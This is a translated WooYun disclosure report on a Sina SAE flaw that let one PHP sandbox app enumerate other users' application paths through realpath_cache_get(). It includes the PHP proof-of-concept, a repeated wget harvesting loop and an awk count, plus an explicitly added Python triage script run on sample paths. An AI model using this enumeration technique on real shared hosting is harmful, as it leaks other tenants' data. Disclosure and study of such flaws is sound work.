
Vulnerability summary

Defect ID: wooyun-2014-086743

Title: Sina SAE allows enumeration of every PHP sandbox user's directory files (1747 enumerated in a matter of minutes)

Vendor: Sina

Author: boooooom

Submitted: 2014-12-11 08:54

Fix time: 2015-01-25 08:56

Published: 2015-01-25 08:56

Vulnerability type: Sensitive information disclosure

Severity: High

Self-assessed Rank: 15

Vulnerability status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-12-11: Details sent to the vendor; awaiting vendor handling
2014-12-11: Vendor confirmed; details disclosed to the vendor only
2014-12-21: Details disclosed to core white hats and relevant domain experts
2014-12-31: Details disclosed to regular white hats
2015-01-10: Details disclosed to intern white hats
2015-01-25: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

PHP has a function, realpath_cache_get(), that returns the absolute paths of the files currently held in the realpath cache. On SAE, the name of a user application is tied to its absolute path: for example, /data1/www/htdocs/612/bzbkorg/1/system/Zend/Cache.php belongs to the application named bzbkorg, whose site is http://bzbkorg.sinaapp.com/

Proof of vulnerability:

Use this function to read the list of files in the cache.
cache.php:

<?php
// Print every absolute path currently held in PHP's realpath cache, one per line.
foreach (array_keys(realpath_cache_get()) as $values) {
    echo $values . "<br/>";
}


Next:
for i in `seq 1 950`;do wget "http://xxx.sinaapp.com/list.php" -O sae.$i.txt;done
Aggregate and deduplicate to extract /data1/www/htdocs/[0-9]+

[root@wocao sina]#cat sae.list |awk -F '/' '{print $1"/"$2"/"$3"/"$4"/"$5}'|uniq|wc -l
1747
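As an added triage example (not code from the report), this Python script applies the report's path-to-app mapping to a constructed sample of realpath cache entries: it collapses the "./" and "//" duplicates seen in the dump, counts distinct sandbox directories the way the awk -F '/' cut does, and flags entries that belong to an app other than the caller's own, which a correctly isolated sandbox should never produce. The sample entries, the sandbox_ids/unique_apps/foreign_entries helpers and the own-app tuple are assumptions for illustration.

```python
import re
from posixpath import normpath

# Constructed sample entries in the report's /data1/www/htdocs/<sandbox>/<app>/<version>/...
# layout (not real leaked data); the './' and '//' variants mirror duplicates in the dump.
SAMPLE_ENTRIES = [
    "/data1/www/htdocs/612/bzbkorg/1/system/Zend/Cache.php",
    "/data1/www/htdocs/130/tujianwu/1/wp-includes/load.php",
    "/data1/www/htdocs/131",
    "/data1/www/htdocs/131/baidupost/1/./plugins/stat/plugin.class.php",
    "/data1/www/htdocs/131/baidupost/1/plugins/stat/plugin.class.php",
    "/data1/www/htdocs/132/duusu/1//source//class/class_core.php",
    "/data1/www/htdocs/132/duusu/1/source/class/class_core.php",
    "/usr/local/lib/php/PEAR.php",  # shared runtime file, not an app directory
]

SANDBOX_RE = re.compile(r"^/data1/www/htdocs/(\d+)(?:/|$)")
APP_RE = re.compile(r"^/data1/www/htdocs/(\d+)/([A-Za-z0-9_-]+)/(\d+)(?:/|$)")


def parse_app(path):
    """Return (sandbox_id, app_name, version) for an SAE app path, else None.
    normpath collapses './' and '//' so duplicate spellings map to one app."""
    m = APP_RE.match(normpath(path))
    return m.groups() if m else None


def sandbox_ids(entries):
    """Distinct /data1/www/htdocs/<n> directories, the quantity the report's awk cut counts."""
    return sorted({m.group(1) for m in map(SANDBOX_RE.match, map(normpath, entries)) if m})


def unique_apps(entries):
    """Distinct (sandbox, app, version) triples visible in the cache."""
    return sorted({a for a in map(parse_app, entries) if a})


def app_url(app_name):
    """Hostname mapping stated in the report: app name -> <name>.sinaapp.com."""
    return f"http://{app_name}.sinaapp.com/"


def foreign_entries(entries, own_app):
    """App paths belonging to a (sandbox, app, version) other than own_app.
    A correctly isolated sandbox should yield an empty list; anything here is a leak."""
    return [e for e in entries if parse_app(e) not in (None, tuple(own_app))]


if __name__ == "__main__":
    own = ("612", "bzbkorg", "1")  # assumed: the app running this check
    print(len(sandbox_ids(SAMPLE_ENTRIES)), "sandbox dirs;", len(unique_apps(SAMPLE_ENTRIES)), "apps")
    for e in foreign_entries(SAMPLE_ENTRIES, own):
        print("LEAK:", e, "->", app_url(parse_app(e)[1]))
```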


That many in a matter of minutes.
Some examples:

[image: sae.jpg]



Fix recommendation:

You're so capable, you surely already know.

Copyright notice: please credit the source, boooooom@WooYun, when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2014-12-11 14:33

Vendor reply:

Thank you for your attention to Sina security; the vulnerability is being fixed.

Latest status:

None yet


Vulnerability review:

Comments

  1. 2014-12-12 17:12 | Enjoy_Hacking ( Intern white hat | Rank:84 Vulnerabilities:8 | Time says nothing; so it goes. )

    Nice sandbox bypass.

  2. 2015-01-03 01:57 | by:小雨 ( Regular white hat | Rank:138 Vulnerabilities:64 )

    Learned something.